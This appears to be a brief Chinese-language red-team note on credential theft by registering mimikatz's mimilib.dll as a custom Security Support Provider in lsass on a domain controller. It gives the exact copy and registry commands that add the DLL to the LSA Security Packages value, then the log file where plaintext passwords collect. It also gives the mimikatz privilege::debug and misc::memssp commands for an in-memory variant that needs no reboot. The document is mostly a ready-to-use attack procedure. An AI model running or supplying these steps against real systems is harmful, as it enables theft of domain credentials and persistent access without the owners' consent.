参考作者:遗忘
介绍:
密码记录ssp(security Support Provider),一个用于身份验证的 dll,系统在启动时 SSP 会被加载到 lsass.exe 进程中,由于 lsa 可扩展,导致在系统启动时我们可以加载一个自定义的 dll,一个用于记录所有登录到当前系统的明文账号密码的 dll,利用mimikatz 中mimilib.dll 文件。
利用方式:
(1)利用方式一:
1、把 mimikatz 中的 mimilib.dll 传到目标域控的 c:windowssystem32目录下
copy mimilib.dll %systemroot%system32
reg query hklmsystemcurrentcontrolsetcontrollsa /v "Security Packages"
reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberos msv1_0 schannel wdigest tspkg pku2u mimilib" /t REG_MULTI_SZ
2、重启成功,如果有用户成功登录到当前系统中,会在 c:windowssystem32 目录下生成一个用于记录登账账号密码的 kiwissp.log 文件
(2)利用方式二:利用进程注入,无需重启立即开启密码记录,重启则计算机失效
mimikatz privilege::debug
mimikatz misc::memssp
type C:WindowsSystem32mimilsa.log